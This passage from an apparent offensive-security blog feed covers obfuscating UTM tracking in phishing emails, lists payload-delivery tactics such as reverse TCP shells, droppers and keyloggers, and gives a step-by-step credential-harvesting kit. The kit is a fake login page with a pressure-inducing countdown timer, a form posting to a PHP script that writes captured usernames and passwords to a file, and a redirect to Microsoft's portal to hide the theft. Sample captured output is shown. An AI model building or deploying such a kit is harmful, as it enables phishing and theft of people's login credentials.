<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_term=phase1</div></div>

for the first phase of multiple campaigns.</li>
</ul>
</li>
</ol>



<h3 class="wp-block-heading">Examples of Obfuscated UTM Parameter Usage </h3>



<p>Let’s consider a practical example of a phishing campaign targeting an organization’s employees. The campaign aims to test the employees’ ability to recognize phishing emails and educate them on best practices without giving away the true intention.</p>



<ol class="wp-block-list">
<li><strong>Crafting the Phishing Email</strong>:
<ul class="wp-block-list">
<li>The email mimics a common phishing tactic, such as a fake invoice notification or a security alert. The email contains a link that directs users to a phishing page designed to look like a legitimate login page.</li>
</ul>
</li>



<li><strong>Adding Obfuscated UTM Parameters to the Link</strong>:
<ul class="wp-block-list">
<li>The URL in the phishing email is tagged with obfuscated UTM parameters:<br>

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">https://www.fake-login.com?utm_source=internal_news&amp;amp;utm_medium=email&amp;amp;utm_campaign=abc123&amp;amp;utm_term=project_alpha&amp;amp;utm_content=doc_link</div></div>

</li>
</ul>
</li>



<li><strong>Launching the Campaign</strong>:
<ul class="wp-block-list">
<li>The phishing email is sent to the targeted employees. Analytics tools track interactions with the email and the tagged URL without employees easily identifying the phish</li>
</ul>
</li>



<li><strong>Analyzing the Results</strong>:
<ul class="wp-block-list">
<li>Post-campaign, the analytics data is reviewed. You can see how many employees from the targeted project clicked on the link (

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_term=project_alpha</div></div>

) and whether different links within the email had varying levels of engagement (

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">utm_content=doc_link</div></div>

)</li>
</ul>
</li>



<li><strong>Adjusting Future Campaigns</strong>:
<ul class="wp-block-list">
<li>The insights from the UTM parameters inform future campaigns. If the data shows that employees are frequently falling for certain types of phishing emails, the training program can be adjusted to address these weaknesses.</li>
</ul>
</li>
</ol>



<h3 class="wp-block-heading">Conclusion</h3>



<p>Incorporating UTM parameters into phishing campaigns is a best practice that significantly enhances the effectiveness of these exercises and elevates your game into a truly targeted experience. By providing detailed tracking and analytics, UTM parameters help your organization understand user behavior, assess campaign effectiveness, and deliver targeted messaging. By obfuscating these parameters, organizations can ensure the phishing remains subtle and effective, offering a realistic experience.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">977</post-id>	</item>
		<item>
		<title>What is a Reverse TCP Shell?</title>
		<link>https://phishandchips.io/what-is-a-reverse-tcp-shell/</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 26 Sep 2023 13:47:25 +0000</pubDate>
				<category><![CDATA[Command and Control (C2)]]></category>
		<category><![CDATA[Framework]]></category>
		<category><![CDATA[Payload Delivery]]></category>
		<guid isPermaLink="false">https://phishandchips.io/?p=938</guid>

					<description><![CDATA[]]></description>
										<content:encoded><![CDATA[]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">938</post-id>	</item>
		<item>
		<title>Pick Your Poison</title>
		<link>https://phishandchips.io/pick-your-poison/</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 26 Sep 2023 13:42:52 +0000</pubDate>
				<category><![CDATA[Framework]]></category>
		<category><![CDATA[Payload Delivery]]></category>
		<category><![CDATA[Tacklebox]]></category>
		<guid isPermaLink="false">https://phishandchips.io/?p=933</guid>

					<description><![CDATA[In this article, we will consider various Payloads and Payload Delivery mechanisms. Although we won&#8217;t get into the specifics of each (yet), we will provide an overview of common tactics. Payloads The goal of any campaign is to have the target initiate their own compromise. With the exception of credential theft, these typically come in [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>In this article, we will consider various Payloads and Payload Delivery mechanisms. Although we won&#8217;t get into the specifics of each (yet), we will provide an overview of common tactics.</p>



<h3 class="wp-block-heading">Payloads</h3>



<p>The goal of any campaign is to have the target initiate their own compromise. With the exception of credential theft, these typically come in the form of executing code from the target&#8217;s system. Some of the payloads may be local to the target system, used to exfiltrate data, or simply be avenues for further compromise or <a href="https://phishandchips.io/category/framework/command-and-control-c2/" data-type="category" data-id="49">remote control</a>.</p>



<p>Here, we&#8217;ve provided some of our favorites, this list is by no means exhaustive.</p>



<p><strong>Local Execution</strong></p>



<ol class="wp-block-list">
<li><strong>Simple Attachments</strong> <br>Emails with file attachments, such as executables or documents (docx, pdf, etc) containing the payload.</li>



<li><strong>Macro-Enabled Documents</strong><br>Payload delivered through macros embedded in documents. These would rely on the application (typically the MS-Office Suite) to execute the embedded scripts and automations.</li>



<li><strong>Trojan Horse</strong> <br>The payload disguised as a legitimate file or installation package.</li>



<li><strong>Drive-By Downloads</strong><br>Links or attachments that trigger automatic payload downloads upon interaction. These are typically web links or HTML documents that trigger in the browser.</li>



<li><strong>Keyloggers</strong><br>A payload that records keystrokes, capturing login credentials and sensitive information.</li>



<li><strong>Browser Extensions</strong><br>Payloads in the form of a browser extension used for control and delivery</li>



<li><strong>Downloaders and Droppers</strong><br>Payloads fetching additional malware from remote servers.</li>



<li><strong>Man-in-the-Middle (MitM) </strong><br>Payloads that allow for traffic interception such as routing communications through a proxy</li>



<li><strong>Password-Protected Zips</strong><br>Payloads hidden within password-protected zip files; a type of <a href="https://phishandchips.io/phishing-attack-framework/" data-type="post" data-id="124">evasion</a>.</li>
</ol>



<p><strong>Web Links</strong></p>



<ol class="wp-block-list" start="1">
<li><strong>Links to Payload Site</strong>s<br>Emails containing links to websites designed to steal login credentials/sensitive data, or deliver the payload through the browser.</li>



<li><strong>Embedded Links</strong><br>Attachments that contain links to sites with payloads.</li>



<li><strong>Credential Harvesting Forms</strong><br>Emails with HTML forms prompting users to enter sensitive information.</li>



<li><strong>Ads</strong><br>Links to compromised ads or websites delivering the payload.</li>
</ol>



<p>Here at P&amp;C.io, our personal favorites are:<br>1) the <a href="https://phishandchips.io/what-is-a-reverse-tcp-shell/" data-type="post" data-id="938">Reverse TCP Shell</a> which, when executed, has the remote workstation establish a connection with our remote TCP listener thus enabling <a href="https://phishandchips.io/category/framework/command-and-control-c2/" data-type="category" data-id="49">C2</a> type activity.</p>



<p>2) Good, old-fashioned <a href="https://phishandchips.io/credential-harvesting-made-easy/" data-type="post" data-id="923">credential harvesting</a>.</p>



<p class="has-text-align-center">What&#8217;s next?</p>



<div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex">
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<p class="has-text-align-center">Related Topics</p>



<div class="wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex">
<div class="wp-block-button is-style-outline inter-section is-style-outline--1"><a class="wp-block-button__link has-secondary-color has-text-color wp-element-button" href="https://phishandchips.io/category/framework/payload-delivery">Payload Delivery</a></div>
</div>
</div>



<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<p class="has-text-align-center">Next Topic</p>



<div class="wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex">
<div class="wp-block-button is-style-outline inter-section is-style-outline--2"><a class="wp-block-button__link has-secondary-color has-text-color wp-element-button" href="https://phishandchips.io/category/framework/command-and-control-c2/">Cmd + Ctrl (C2)</a></div>
</div>
</div>
</div>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">933</post-id>	</item>
		<item>
		<title>Credential Harvesting Made Easy</title>
		<link>https://phishandchips.io/credential-harvesting-made-easy/</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 25 Sep 2023 19:33:12 +0000</pubDate>
				<category><![CDATA[Data Harvesting]]></category>
		<category><![CDATA[Framework]]></category>
		<guid isPermaLink="false">https://phishandchips.io/?p=923</guid>

					<description><![CDATA[Here at P&#38;C, we believe the lowest-energy means to accomplish the task is often the best. In this article, we will set-up a credential trap payload in a few easy steps using tools that are readily available to anyone. Tools &#38; Materials To set-up this credential trap, you will need a text editor and a [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>Here at P&amp;C, we believe the lowest-energy means to accomplish the task is often the best. In this article, we will set-up a credential trap payload in a few easy steps using tools that are readily available to <em>anyone</em>.</p>



<h2 class="wp-block-heading">Tools &amp; Materials</h2>



<p>To set-up this credential trap, you will need a text editor and a web server.<mark style="background-color:#9EF9FD" class="has-inline-color has-base-color"> We wouldn&#8217;t recommend using anything production-quality as publicizing a credential trap will likely get your domain flagged for suspicious content.</mark></p>



<p>That said, at your own risk.</p>



<h2 class="wp-block-heading">Sample Code?</h2>



<p>Yes, you may find our basic cred-trap, along with other materials from this site, on our GitHub:<br><a href="https://github.com/PhishAndChips-io/cred-trap">https://github.com/PhishAndChips-io/cred-trap</a></p>



<h2 class="wp-block-heading">How does it work?</h2>



<p>The primary payload is index.html.<br>You can see a LIVE version here:<br><a href="https://phishandchips.io/static/cred-trap/" target="_blank" rel="noreferrer noopener">https://phishandchips.io/static/cred-trap/</a></p>



<p>There&#8217;s a lot to unpack here.. so let&#8217;s go through it.</p>



<figure class="wp-block-image size-large wp-duotone-unset-3"><img fetchpriority="high" decoding="async" width="1024" height="427" src="https://phishandchips.io/wp-content/uploads/2023/09/cred-trap-1024x427.png" alt="" class="wp-image-924" srcset="https://phishandchips.io/wp-content/uploads/2023/09/cred-trap-1024x427.png 1024w, https://phishandchips.io/wp-content/uploads/2023/09/cred-trap-300x125.png 300w, https://phishandchips.io/wp-content/uploads/2023/09/cred-trap-768x320.png 768w, https://phishandchips.io/wp-content/uploads/2023/09/cred-trap.png 1207w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>here, we have some <a href="https://phishandchips.io/category/framework/social-engineering/" data-type="category" data-id="46">social engineering</a> at play&#8230;</p>



<ol class="wp-block-list">
<li>We have a timer (written in javascript) that says you have 00:30s to act quickly.</li>



<li>We have some reassuring message from your IT department&#8211;&#8220;We&#8217;ve added this <em>for your safety</em>&#8220;</li>



<li>We have a friendly placeholder in the template for a logo as well as a FAVICON&#8212; you know, for the <mark style="background-color:#D8E202" class="has-inline-color">really authentic experience</mark>.</li>
</ol>



<p></p>



<h3 class="wp-block-heading">Behind the Scenes&#8230;</h3>



<div class="wp-block-group has-black-background-color has-background has-global-padding is-layout-constrained wp-container-core-group-is-layout-95730b41 wp-block-group-is-layout-constrained" style="padding-top:0;padding-bottom:0">

<div class="codecolorer-container html4strict blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="html4strict codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">&nbsp;<span style="color: #009900;">&lt;<a href="http://december.com/html/4/element/form.html"><span style="color: #000000; font-weight: bold;">form</span></a> <span style="color: #000066;">action</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;https://phishandchips.io/static/cred-trap/submit.php&quot;</span> <span style="color: #000066;">method</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;post&quot;</span>&gt;</span><br />
&nbsp; &nbsp; <span style="color: #009900;">&lt;<a href="http://december.com/html/4/element/div.html"><span style="color: #000000; font-weight: bold;">div</span></a> <span style="color: #000066;">class</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;row&quot;</span>&gt;</span> &nbsp; <br />
&nbsp; &nbsp; &nbsp; <span style="color: #009900;">&lt;<a href="http://december.com/html/4/element/div.html"><span style="color: #000000; font-weight: bold;">div</span></a> <span style="color: #000066;">class</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;col&quot;</span>&gt;</span><br />
<span style="color: #009900;">&lt;<a href="http://december.com/html/4/element/center.html"><span style="color: #000000; font-weight: bold;">center</span></a>&gt;</span><br />
<span style="color: #009900;">&lt;<a href="http://december.com/html/4/element/img.html"><span style="color: #000000; font-weight: bold;">img</span></a> <span style="color: #000066;">src</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;URL/logo.png&quot;</span>&gt;</span><br />
<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><a href="http://december.com/html/4/element/center.html"><span style="color: #000000; font-weight: bold;">center</span></a>&gt;</span> &nbsp; &nbsp; &nbsp;<br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #009900;">&lt;<a href="http://december.com/html/4/element/input.html"><span style="color: #000000; font-weight: bold;">input</span></a> <span style="color: #000066;">type</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;text&quot;</span> <span style="color: #000066;">name</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;username&quot;</span> placeholder<span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;Username&quot;</span> required&gt;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #009900;">&lt;<a href="http://december.com/html/4/element/input.html"><span style="color: #000000; font-weight: bold;">input</span></a> <span style="color: #000066;">type</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;password&quot;</span> <span style="color: #000066;">name</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;password&quot;</span> placeholder<span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;Password&quot;</span> required&gt;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #009900;">&lt;<a href="http://december.com/html/4/element/input.html"><span style="color: #000000; font-weight: bold;">input</span></a> <span style="color: #000066;">type</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;submit&quot;</span> <span style="color: #000066;">value</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;Login&quot;</span>&gt;</span><br />
&nbsp; &nbsp; &nbsp; <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><a href="http://december.com/html/4/element/div.html"><span style="color: #000000; font-weight: bold;">div</span></a>&gt;</span> &nbsp; <br />
&nbsp; &nbsp; <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><a href="http://december.com/html/4/element/div.html"><span style="color: #000000; font-weight: bold;">div</span></a>&gt;</span><br />
&nbsp; <span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><a href="http://december.com/html/4/element/form.html"><span style="color: #000000; font-weight: bold;">form</span></a>&gt;</span></div></div>




<p class="has-small-font-size" style="padding-top:0px;padding-right:var(--wp--preset--spacing--30);padding-bottom:0px;padding-left:var(--wp--preset--spacing--30)">&lt;form> tag snippet.</p>
</div>



<p>Here is our form.. all it&#8217;s doing is passing the username and password fields to our submit.php&#8230; this file can be hosted <em>anywhere</em>, and if you&#8217;re into <a href="https://phishandchips.io/category/framework/evasion/" data-type="category" data-id="51">Evasion</a>, you will place it far away from your index.</p>



<p>Second&#8230; check out this countdown timer:</p>



<div class="wp-block-group has-black-background-color has-background has-global-padding is-layout-constrained wp-container-core-group-is-layout-95730b41 wp-block-group-is-layout-constrained" style="padding-top:0;padding-bottom:0">

<div class="codecolorer-container javascript blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;height:300px;"><div class="javascript codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;"><span style="color: #339933;">&lt;</span>script<span style="color: #339933;">&gt;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #006600; font-style: italic;">// Set the countdown duration in seconds</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #000066; font-weight: bold;">var</span> countdownDuration <span style="color: #339933;">=</span> <span style="color: #CC0000;">30</span><span style="color: #339933;">;</span> <span style="color: #006600; font-style: italic;">// Change this to your desired countdown duration</span><br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #006600; font-style: italic;">// Function to update the countdown display</span><br />
&nbsp; &nbsp; &nbsp; &nbsp;<span style="color: #000066; font-weight: bold;">function</span> updateCountdown<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; <span style="color: #000066; font-weight: bold;">var</span> countdownElement <span style="color: #339933;">=</span> document.<span style="color: #660066;">getElementById</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;countdown&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <span style="color: #000066; font-weight: bold;">var</span> seconds <span style="color: #339933;">=</span> countdownDuration <span style="color: #339933;">%</span> <span style="color: #CC0000;">60</span><span style="color: #339933;">;</span> <span style="color: #006600; font-style: italic;">// Calculate the seconds</span><br />
&nbsp; &nbsp; <span style="color: #000066; font-weight: bold;">var</span> formattedSeconds <span style="color: #339933;">=</span> seconds <span style="color: #339933;">&lt;</span> <span style="color: #CC0000;">10</span> <span style="color: #339933;">?</span> <span style="color: #3366CC;">&quot;0&quot;</span> <span style="color: #339933;">+</span> seconds <span style="color: #339933;">:</span> seconds<span style="color: #339933;">;</span> <span style="color: #006600; font-style: italic;">// Add leading zero if needed</span><br />
&nbsp; &nbsp; countdownElement.<span style="color: #660066;">textContent</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;Session timeout in 00:&quot;</span> <span style="color: #339933;">+</span> formattedSeconds <span style="color: #339933;">+</span> <span style="color: #3366CC;">&quot; &quot;</span><span style="color: #339933;">;</span><br />
<br />
&nbsp; &nbsp; <span style="color: #006600; font-style: italic;">// Change text color to red if less than 10 seconds</span><br />
&nbsp; &nbsp; <span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span>countdownDuration <span style="color: #339933;">&lt;</span> <span style="color: #CC0000;">10</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; countdownElement.<span style="color: #660066;">style</span>.<span style="color: #660066;">color</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;red&quot;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <span style="color: #009900;">&#125;</span> <span style="color: #000066; font-weight: bold;">else</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; countdownElement.<span style="color: #660066;">style</span>.<span style="color: #660066;">color</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;black&quot;</span><span style="color: #339933;">;</span> <span style="color: #006600; font-style: italic;">// Set the default color</span><br />
&nbsp; &nbsp; <span style="color: #009900;">&#125;</span><br />
<span style="color: #009900;">&#125;</span><br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #006600; font-style: italic;">// Function to start the countdown</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #000066; font-weight: bold;">function</span> startCountdown<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; updateCountdown<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #006600; font-style: italic;">// Update the countdown every second</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #000066; font-weight: bold;">var</span> countdownInterval <span style="color: #339933;">=</span> setInterval<span style="color: #009900;">&#40;</span><span style="color: #000066; font-weight: bold;">function</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; countdownDuration<span style="color: #339933;">--;</span><br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span>countdownDuration <span style="color: #339933;">&lt;=</span> <span style="color: #CC0000;">0</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; clearInterval<span style="color: #009900;">&#40;</span>countdownInterval<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #006600; font-style: italic;">// Stop the countdown when it reaches 0</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; document.<span style="color: #660066;">getElementById</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;message-container&quot;</span><span style="color: #009900;">&#41;</span>.<span style="color: #660066;">innerHTML</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;&lt;p&gt;Your session has timed out.&lt;/p&gt;&quot;</span><span style="color: #339933;">;</span><br />
&nbsp;<span style="color: #006600; font-style: italic;">// Redirect the user to a new page after the timeout (change the URL)</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; setTimeout<span style="color: #009900;">&#40;</span><span style="color: #000066; font-weight: bold;">function</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; window.<span style="color: #660066;">location</span>.<span style="color: #660066;">href</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;https://portal.microsoft.com&quot;</span><span style="color: #339933;">;</span> <span style="color: #006600; font-style: italic;">// Change the URL to your desired destination</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #009900;">&#125;</span><span style="color: #339933;">,</span> <span style="color: #CC0000;">2000</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #009900;">&#125;</span> <span style="color: #000066; font-weight: bold;">else</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; updateCountdown<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #009900;">&#125;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #009900;">&#125;</span><span style="color: #339933;">,</span> <span style="color: #CC0000;">1000</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #006600; font-style: italic;">// 1000 milliseconds = 1 second</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #009900;">&#125;</span><br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #006600; font-style: italic;">// Start the countdown when the page loads</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; window.<span style="color: #660066;">onload</span> <span style="color: #339933;">=</span> startCountdown<span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <span style="color: #339933;">&lt;/</span>script<span style="color: #339933;">&gt;</span></div></div>




<p class="has-small-font-size" style="padding-top:0px;padding-right:var(--wp--preset--spacing--30);padding-bottom:0px;padding-left:var(--wp--preset--spacing--30)">Countdown function&#8212; javascript</p>
</div>



<p>This is pretty boiler-plate stuff&#8230; At the end of the countdown, we set the redirect URL to:  https://portal.microsoft.com, which should be a login page for Microsoft&#8212; this is to simulate &#8220;oops, you&#8217;ve been logged out&#8221;  </p>



<p>*NOTE.. if you&#8217;re not good with code, you can always ask <a href="https://chat.openai.com" data-type="link" data-id="https://chat.openai.com" target="_blank" rel="noreferrer noopener">ChatGPT</a></p>



<h3 class="wp-block-heading">Let&#8217;s see submit.php</h3>



<div class="wp-block-group has-black-background-color has-background has-global-padding is-layout-constrained wp-container-core-group-is-layout-95730b41 wp-block-group-is-layout-constrained" style="padding-top:0;padding-bottom:0">

<div class="codecolorer-container php blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;height:300px;"><div class="php codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;"><span style="color: #000000; font-weight: bold;">&lt;?php</span><br />
<br />
<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$_SERVER</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">&quot;REQUEST_METHOD&quot;</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">===</span> <span style="color: #0000ff;">&quot;POST&quot;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; <span style="color: #000088;">$name</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">&quot;username&quot;</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <span style="color: #000088;">$password</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">&quot;password&quot;</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <br />
&nbsp; &nbsp; <span style="color: #666666; font-style: italic;">// Open the file for appending</span><br />
&nbsp; &nbsp; <span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/fopen"><span style="color: #990000;">fopen</span></a><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;data.txt&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;a&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <br />
&nbsp; &nbsp; <span style="color: #666666; font-style: italic;">// Append the data to the file</span><br />
&nbsp; &nbsp; <a href="http://www.php.net/fwrite"><span style="color: #990000;">fwrite</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$file</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;Username: &quot;</span> <span style="color: #339933;">.</span> <span style="color: #000088;">$name</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">&quot;, &quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <a href="http://www.php.net/fwrite"><span style="color: #990000;">fwrite</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$file</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;Password: &quot;</span> <span style="color: #339933;">.</span> <span style="color: #000088;">$password</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">&quot;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <br />
&nbsp; &nbsp; <span style="color: #666666; font-style: italic;">// Close the file</span><br />
&nbsp; &nbsp; <a href="http://www.php.net/fclose"><span style="color: #990000;">fclose</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$file</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <br />
&nbsp; &nbsp; <span style="color: #666666; font-style: italic;">// Redirect back to the form page or a thank you page</span><br />
&nbsp; &nbsp; <a href="http://www.php.net/header"><span style="color: #990000;">header</span></a><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;Location: https://portal.microsoft.com&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br />
&nbsp; &nbsp; <a href="http://www.php.net/exit"><span style="color: #990000;">exit</span></a><span style="color: #339933;">;</span><br />
<span style="color: #009900;">&#125;</span> <span style="color: #b1b100;">else</span> <span style="color: #009900;">&#123;</span><br />
&nbsp; &nbsp; <span style="color: #b1b100;">echo</span> <span style="color: #0000ff;">&quot;Invalid request.&quot;</span><span style="color: #339933;">;</span><br />
<span style="color: #009900;">&#125;</span><br />
<span style="color: #000000; font-weight: bold;">?&gt;</span></div></div>




<p class="has-small-font-size" style="padding-top:0px;padding-right:var(--wp--preset--spacing--30);padding-bottom:0px;padding-left:var(--wp--preset--spacing--30)">submit.php</p>
</div>



<p>Short story goes&#8230; we just receive a POST to page, open data.txt, write the form contents, then redirect the user to portal.microsoft.com anyway&#8211;</p>



<p>And that&#8217;s it&#8230;</p>



<p>The output:</p>



<div class="wp-block-group has-black-background-color has-background has-global-padding is-layout-constrained wp-container-core-group-is-layout-95730b41 wp-block-group-is-layout-constrained" style="padding-top:0;padding-bottom:0">

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">Username: TEST, Password: password<br />
Username: TEST, Password: TEST<br />
Username: go, Password: phish<br />
Username: anotha, Password: one<br />
Username: TEST, Password: 1234</div></div>




